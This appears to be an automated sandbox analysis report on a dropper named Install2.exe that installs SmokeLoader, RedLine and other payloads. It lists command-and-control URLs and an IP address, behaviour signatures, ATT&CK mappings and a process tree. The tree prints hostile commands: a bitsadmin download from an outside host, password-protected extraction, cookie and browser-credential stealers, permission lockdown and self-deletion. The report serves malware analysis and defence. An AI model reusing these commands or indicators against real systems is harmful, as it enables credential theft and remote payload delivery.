Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    152s
  • max time network
    209s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    27-04-2021 19:11

Errors

Reason
Machine shutdown

General

  • Target

    Install2.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

1414

C2

188.119.112.16:46409

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 28 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 54 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Program crash 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 39 IoCs
  • Modifies data under HKEY_USERS 30 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:856
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:2384
    • C:\Users\Admin\AppData\Local\Temp\Install2.exe
      "C:\Users\Admin\AppData\Local\Temp\Install2.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1088
      • C:\Users\Admin\AppData\Local\Temp\is-JE5UK.tmp\Install2.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-JE5UK.tmp\Install2.tmp" /SL5="$400CE,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install2.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2004
        • C:\Users\Admin\AppData\Local\Temp\is-HOBM8.tmp\Ultra.exe
          "C:\Users\Admin\AppData\Local\Temp\is-HOBM8.tmp\Ultra.exe" /S /UID=burnerch1
          3⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Program Files directory
          • Suspicious use of WriteProcessMemory
          PID:404
          • C:\Program Files\Google\KUANGARYYS\ultramediaburner.exe
            "C:\Program Files\Google\KUANGARYYS\ultramediaburner.exe" /VERYSILENT
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:384
            • C:\Users\Admin\AppData\Local\Temp\is-JTMPE.tmp\ultramediaburner.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-JTMPE.tmp\ultramediaburner.tmp" /SL5="$7001A,281924,62464,C:\Program Files\Google\KUANGARYYS\ultramediaburner.exe" /VERYSILENT
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:1464
              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                6⤵
                • Executes dropped EXE
                PID:780
          • C:\Users\Admin\AppData\Local\Temp\83-aa0f2-af5-9a987-7ee7ebd1f23da\SHamuhacozhae.exe
            "C:\Users\Admin\AppData\Local\Temp\83-aa0f2-af5-9a987-7ee7ebd1f23da\SHamuhacozhae.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1500
            • C:\Program Files\Internet Explorer\iexplore.exe
              "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
              5⤵
              • Modifies Internet Explorer settings
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2032
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2032 CREDAT:275457 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:1336
              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2032 CREDAT:340994 /prefetch:2
                6⤵
                • Modifies Internet Explorer settings
                • Suspicious use of SetWindowsHookEx
                PID:280
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 280 -s 1420
                  7⤵
                  • Program crash
                  PID:2604
          • C:\Users\Admin\AppData\Local\Temp\91-130b7-307-7a78a-c368a32baf693\Saevupicezha.exe
            "C:\Users\Admin\AppData\Local\Temp\91-130b7-307-7a78a-c368a32baf693\Saevupicezha.exe"
            4⤵
            • Executes dropped EXE
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:480
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vpc2ths0.wg1\skipper.exe /s & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2632
              • C:\Users\Admin\AppData\Local\Temp\vpc2ths0.wg1\skipper.exe
                C:\Users\Admin\AppData\Local\Temp\vpc2ths0.wg1\skipper.exe /s
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:2728
                • C:\Users\Admin\AppData\Local\Temp\93950757.exe
                  C:\Users\Admin\AppData\Local\Temp\93950757.exe
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:2540
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    8⤵
                      PID:1288
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\vpc2ths0.wg1\skipper.exe & exit
                    7⤵
                      PID:2040
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 0
                        8⤵
                        • Runs ping.exe
                        PID:2548
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gzlnpanh.4lw\001.exe & exit
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3028
                  • C:\Users\Admin\AppData\Local\Temp\gzlnpanh.4lw\001.exe
                    C:\Users\Admin\AppData\Local\Temp\gzlnpanh.4lw\001.exe
                    6⤵
                    • Executes dropped EXE
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    PID:280
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c1xew1pm.vfh\gpooe.exe & exit
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2584
                  • C:\Users\Admin\AppData\Local\Temp\c1xew1pm.vfh\gpooe.exe
                    C:\Users\Admin\AppData\Local\Temp\c1xew1pm.vfh\gpooe.exe
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Adds Run key to start application
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of WriteProcessMemory
                    PID:2644
                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      7⤵
                      • Executes dropped EXE
                      PID:2900
                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                      7⤵
                      • Executes dropped EXE
                      PID:2924
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cdxv3b1s.cts\google-game.exe & exit
                  5⤵
                    PID:2356
                    • C:\Users\Admin\AppData\Local\Temp\cdxv3b1s.cts\google-game.exe
                      C:\Users\Admin\AppData\Local\Temp\cdxv3b1s.cts\google-game.exe
                      6⤵
                      • Executes dropped EXE
                      • Drops file in Program Files directory
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      • Suspicious use of SetWindowsHookEx
                      PID:2408
                      • C:\Windows\SysWOW64\rundll32.exe
                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                        7⤵
                        • Loads dropped DLL
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2568
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fscd3ynj.v0w\md1_1eaf.exe & exit
                    5⤵
                      PID:2668
                      • C:\Users\Admin\AppData\Local\Temp\fscd3ynj.v0w\md1_1eaf.exe
                        C:\Users\Admin\AppData\Local\Temp\fscd3ynj.v0w\md1_1eaf.exe
                        6⤵
                        • Executes dropped EXE
                        • Modifies system certificate store
                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                        PID:2876
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eulldmll.25v\askinstall39.exe & exit
                      5⤵
                        PID:2496
                        • C:\Users\Admin\AppData\Local\Temp\eulldmll.25v\askinstall39.exe
                          C:\Users\Admin\AppData\Local\Temp\eulldmll.25v\askinstall39.exe
                          6⤵
                          • Executes dropped EXE
                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2616
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c taskkill /f /im chrome.exe
                            7⤵
                              PID:2456
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im chrome.exe
                                8⤵
                                • Kills process with taskkill
                                PID:2132
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aqysthqx.uhf\requête.exe & exit
                          5⤵
                            PID:1148
                            • C:\Users\Admin\AppData\Local\Temp\aqysthqx.uhf\requête.exe
                              C:\Users\Admin\AppData\Local\Temp\aqysthqx.uhf\requête.exe
                              6⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                              PID:2016
                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                PID:2280
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                  parse.exe -f json -b firefox
                                  8⤵
                                  • Executes dropped EXE
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:1228
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                  parse.exe -f json -b chrome
                                  8⤵
                                  • Executes dropped EXE
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:2572
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                  parse.exe -f json -b edge
                                  8⤵
                                  • Executes dropped EXE
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:2168
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hoyjxon0.h15\SunLabsPlayer.exe /S & exit
                            5⤵
                              PID:2160
                              • C:\Users\Admin\AppData\Local\Temp\hoyjxon0.h15\SunLabsPlayer.exe
                                C:\Users\Admin\AppData\Local\Temp\hoyjxon0.h15\SunLabsPlayer.exe /S
                                6⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Drops file in Program Files directory
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:2436
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                  7⤵
                                  • Drops file in Program Files directory
                                  PID:1668
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                  7⤵
                                    PID:896
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                    7⤵
                                      PID:2428
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                      7⤵
                                      • Drops file in Program Files directory
                                      PID:968
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                      7⤵
                                        PID:2156
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                        7⤵
                                          PID:2068
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                          7⤵
                                          • Checks for any installed AV software in registry
                                          PID:2368
                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                          7⤵
                                          • Download via BitsAdmin
                                          PID:2856
                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pHlkK8TOjY8FNbWF -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                          7⤵
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          PID:1688
                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pqi2C5HpEuJvfOs0 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:2968
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                          7⤵
                                            PID:2988
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                            7⤵
                                            • Drops file in Program Files directory
                                            PID:2572
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                            7⤵
                                              PID:1584
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                              7⤵
                                                PID:2276
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:1732
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\orIRpJxOmHOi\orIRpJxOmHOi.dll" orIRpJxOmHOi
                                                  7⤵
                                                    PID:2892
                                                    • C:\Windows\system32\rundll32.exe
                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\orIRpJxOmHOi\orIRpJxOmHOi.dll" orIRpJxOmHOi
                                                      8⤵
                                                        PID:2020
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:2544
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                                        7⤵
                                                        • Drops file in Program Files directory
                                                        PID:2988
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:2292
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:2128
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsn25BB.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:2472
                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                              7⤵
                                                                PID:2856
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sixymg4i.3t2\005.exe & exit
                                                            5⤵
                                                              PID:2180
                                                              • C:\Users\Admin\AppData\Local\Temp\sixymg4i.3t2\005.exe
                                                                C:\Users\Admin\AppData\Local\Temp\sixymg4i.3t2\005.exe
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                PID:2376
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\echrf520.45u\GcleanerWW.exe /mixone & exit
                                                              5⤵
                                                                PID:3024
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y4pjkxsv.zvo\toolspab1.exe & exit
                                                                5⤵
                                                                  PID:2320
                                                                  • C:\Users\Admin\AppData\Local\Temp\y4pjkxsv.zvo\toolspab1.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\y4pjkxsv.zvo\toolspab1.exe
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                    PID:2404
                                                                    • C:\Users\Admin\AppData\Local\Temp\y4pjkxsv.zvo\toolspab1.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\y4pjkxsv.zvo\toolspab1.exe
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:2688
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uh41e4hf.qbm\c7ae36fa.exe & exit
                                                                  5⤵
                                                                    PID:2472
                                                                    • C:\Users\Admin\AppData\Local\Temp\uh41e4hf.qbm\c7ae36fa.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\uh41e4hf.qbm\c7ae36fa.exe
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:2536
                                                          • C:\Users\Admin\AppData\Local\Temp\21B4.exe
                                                            C:\Users\Admin\AppData\Local\Temp\21B4.exe
                                                            1⤵
                                                              PID:1400
                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                icacls "C:\Users\Admin\AppData\Local\a9a99b39-5754-4a60-9423-9e0322e21342" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                2⤵
                                                                • Modifies file permissions
                                                                PID:876
                                                              • C:\Users\Admin\AppData\Local\Temp\21B4.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\21B4.exe" --Admin IsNotAutoStart IsNotTask
                                                                2⤵
                                                                  PID:1936
                                                                  • C:\Users\Admin\AppData\Local\76cc88ed-782e-452e-9e6a-b4a6fd69b1d1\updatewin1.exe
                                                                    "C:\Users\Admin\AppData\Local\76cc88ed-782e-452e-9e6a-b4a6fd69b1d1\updatewin1.exe"
                                                                    3⤵
                                                                      PID:2280
                                                                      • C:\Users\Admin\AppData\Local\76cc88ed-782e-452e-9e6a-b4a6fd69b1d1\updatewin1.exe
                                                                        "C:\Users\Admin\AppData\Local\76cc88ed-782e-452e-9e6a-b4a6fd69b1d1\updatewin1.exe" --Admin
                                                                        4⤵
                                                                          PID:3024
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
                                                                            5⤵
                                                                              PID:1688
                                                                        • C:\Users\Admin\AppData\Local\76cc88ed-782e-452e-9e6a-b4a6fd69b1d1\updatewin2.exe
                                                                          "C:\Users\Admin\AppData\Local\76cc88ed-782e-452e-9e6a-b4a6fd69b1d1\updatewin2.exe"
                                                                          3⤵
                                                                            PID:2560
                                                                          • C:\Users\Admin\AppData\Local\76cc88ed-782e-452e-9e6a-b4a6fd69b1d1\5.exe
                                                                            "C:\Users\Admin\AppData\Local\76cc88ed-782e-452e-9e6a-b4a6fd69b1d1\5.exe"
                                                                            3⤵
                                                                              PID:2964
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 232
                                                                                4⤵
                                                                                • Program crash
                                                                                PID:1660
                                                                        • C:\Users\Admin\AppData\Local\Temp\2888.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\2888.exe
                                                                          1⤵
                                                                            PID:2064
                                                                          • C:\Users\Admin\AppData\Local\Temp\2ACA.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\2ACA.exe
                                                                            1⤵
                                                                              PID:2812
                                                                            • C:\Users\Admin\AppData\Local\Temp\322B.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\322B.exe
                                                                              1⤵
                                                                                PID:2908
                                                                              • C:\Users\Admin\AppData\Local\Temp\4D59.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\4D59.exe
                                                                                1⤵
                                                                                  PID:2688
                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                  1⤵
                                                                                    PID:2820
                                                                                  • C:\Windows\explorer.exe
                                                                                    C:\Windows\explorer.exe
                                                                                    1⤵
                                                                                      PID:3000

                                                                                    Network

                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                    Persistence

                                                                                    Registry Run Keys / Startup Folder

                                                                                    1
                                                                                    T1060

                                                                                    BITS Jobs

                                                                                    1
                                                                                    T1197

                                                                                    Defense Evasion

                                                                                    File Permissions Modification

                                                                                    1
                                                                                    T1222

                                                                                    Modify Registry

                                                                                    3
                                                                                    T1112

                                                                                    BITS Jobs

                                                                                    1
                                                                                    T1197

                                                                                    Install Root Certificate

                                                                                    1
                                                                                    T1130

                                                                                    Credential Access

                                                                                    Credentials in Files

                                                                                    1
                                                                                    T1081

                                                                                    Discovery

                                                                                    Software Discovery

                                                                                    1
                                                                                    T1518

                                                                                    Security Software Discovery

                                                                                    1
                                                                                    T1063

                                                                                    Query Registry

                                                                                    3
                                                                                    T1012

                                                                                    System Information Discovery

                                                                                    3
                                                                                    T1082

                                                                                    Peripheral Device Discovery

                                                                                    1
                                                                                    T1120

                                                                                    Remote System Discovery

                                                                                    1
                                                                                    T1018

                                                                                    Collection

                                                                                    Data from Local System

                                                                                    1
                                                                                    T1005

                                                                                    Command and Control

                                                                                    Web Service

                                                                                    1
                                                                                    T1102

                                                                                    Replay Monitor

                                                                                    Loading Replay Monitor...

                                                                                    Downloads

                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                      MD5

                                                                                      7124be0b78b9f4976a9f78aaeaed893a

                                                                                      SHA1

                                                                                      804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                      SHA256

                                                                                      bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                      SHA512

                                                                                      49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

